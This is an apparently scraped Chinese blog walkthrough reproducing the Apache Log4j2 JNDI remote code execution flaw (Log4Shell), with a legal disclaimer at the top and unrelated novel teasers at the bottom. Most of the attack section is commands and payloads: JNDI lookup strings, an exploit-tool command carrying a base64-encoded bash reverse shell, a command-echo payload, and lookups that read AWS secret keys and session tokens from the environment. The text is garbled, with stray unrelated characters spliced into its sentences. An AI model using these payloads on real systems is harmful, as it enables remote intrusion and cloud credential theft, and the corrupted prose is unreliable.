Apache Log4j2 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

遵紀(jì)守法

任何個人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律膀哲,遵守公共秩序啃沪,尊重社會公德,不得危害網(wǎng)絡(luò)安全憔晒,不得利用網(wǎng)絡(luò)從事危害國家安全藻肄、榮譽(yù)和利益

漏洞描述

Apache Log4j2是一款優(yōu)秀的Java日志框架。2021年11月24日拒担,阿里云安全團(tuán)隊(duì)向Apache官方報告了Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞嘹屯。由于Apache Log4j2某些功能存在遞歸解析功能,攻擊者可直接構(gòu)造惡意請求从撼,觸發(fā)遠(yuǎn)程代碼執(zhí)行漏洞州弟。漏洞利用無需特殊配置,經(jīng)阿里云安全團(tuán)隊(duì)驗(yàn)證低零,Apache Struts2婆翔、Apache Solr、Apache Druid掏婶、Apache Flink等均受影響啃奴。2021年12月10日,阿里云安全團(tuán)隊(duì)發(fā)現(xiàn) Apache Log4j 2.15.0-rc1 版本存在漏洞繞過雄妥,請及時更新至 Apache Log4j 2.15.0-rc2 版本最蕾。阿里云應(yīng)急響應(yīng)中心提醒 Apache Log4j2 用戶盡快采取安全措施阻止漏洞攻擊。

影響版本

Apache Log4j 2.x < 2.15.0-rc2

測試環(huán)境

1.png

首先把demo環(huán)境運(yùn)行起來

java -jar demo.jar

訪問頁面提交payload

默認(rèn)是 http://IP:8080/hello
${jndi:ldap://6chk06.dnslog.cn/test}
2.png

成功收到信息說明存在漏洞

1.執(zhí)行命令

需要 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar啟一個ldap服務(wù)

-C 是執(zhí)行命令 根據(jù)不同的操作系統(tǒng)
#windows
C:\Windows\System32\calc.exe
#linux
"touch /tmp/123"
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.222.1"

本次測試就用下邊這個
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\Windows\System32\calc.exe"
3.png
7.png

2.命令回顯

這里用到JNDIExploit-1.2-SNAPSHOT.jar工具啟一個ldap服務(wù)

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0
4.png

提交payload

cmd: whoami
Content-Type: application/x-www-form-urlencoded

payload=${jndi:ldap://192.168.222.1:1234/TomcatBypass/TomcatEcho}
5.png

命令查詢信息

${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末老厌,一起剝皮案震驚了整個濱河市瘟则,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌梅桩,老刑警劉巖壹粟,帶你破解...
    沈念sama閱讀 222,104評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件拜隧,死亡現(xiàn)場離奇詭異宿百,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)洪添,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,816評論 3 399
  • 文/潘曉璐 我一進(jìn)店門垦页,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人干奢,你說我怎么就攤上這事痊焊。” “怎么了忿峻?”我有些...
    開封第一講書人閱讀 168,697評論 0 360
  • 文/不壞的土叔 我叫張陵薄啥,是天一觀的道長。 經(jīng)常有香客問我逛尚,道長,這世上最難降的妖魔是什么绰寞? 我笑而不...
    開封第一講書人閱讀 59,836評論 1 298
  • 正文 為了忘掉前任,我火速辦了婚禮脑题,結(jié)果婚禮上铜靶,老公的妹妹穿的比我還像新娘旷坦。我一直安慰自己,他們只是感情好旗芬,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,851評論 6 397
  • 文/花漫 我一把揭開白布疮丛。 她就那樣靜靜地躺著誊薄,像睡著了一般锰茉。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上片吊,一...
    開封第一講書人閱讀 52,441評論 1 310
  • 那天协屡,我揣著相機(jī)與錄音,去河邊找鬼爷贫。 笑死补憾,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的盈匾。 我是一名探鬼主播,決...
    沈念sama閱讀 40,992評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼窑睁,長吁一口氣:“原來是場噩夢啊……” “哼担钮!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起狭姨,我...
    開封第一講書人閱讀 39,899評論 0 276
  • 序言:老撾萬榮一對情侶失蹤饼拍,失蹤者是張志新(化名)和其女友劉穎师抄,沒想到半個月后教硫,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體瞬矩,經(jīng)...
    沈念sama閱讀 46,457評論 1 318
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡景用,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,529評論 3 341
  • 正文 我和宋清朗相戀三年伞插,在試婚紗的時候發(fā)現(xiàn)自己被綠了割粮。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,664評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡蜂怎,死狀恐怖置尔,靈堂內(nèi)的尸體忽然破棺而出杠步,到底是詐尸還是另有隱情榜轿,我是刑警寧澤幽歼,帶...
    沈念sama閱讀 36,346評論 5 350
  • 正文 年R本政府宣布,位于F島的核電站甸私,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏飞傀。R本人自食惡果不足惜皇型,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,025評論 3 334
  • 文/蒙蒙 一诬烹、第九天 我趴在偏房一處隱蔽的房頂上張望弃鸦。 院中可真熱鬧绞吁,春花似錦家破、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,511評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽乾吻。三九已至,卻和暖如春女淑,著一層夾襖步出監(jiān)牢的瞬間辜御,已是汗流浹背鸭你。 一陣腳步聲響...
    開封第一講書人閱讀 33,611評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留擒权,地道東北人袱巨。 一個月前我還...
    沈念sama閱讀 49,081評論 3 377
  • 正文 我出身青樓,卻偏偏與公主長得像碳抄,于是被迫代替她去往敵國和親愉老。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,675評論 2 359

推薦閱讀更多精彩內(nèi)容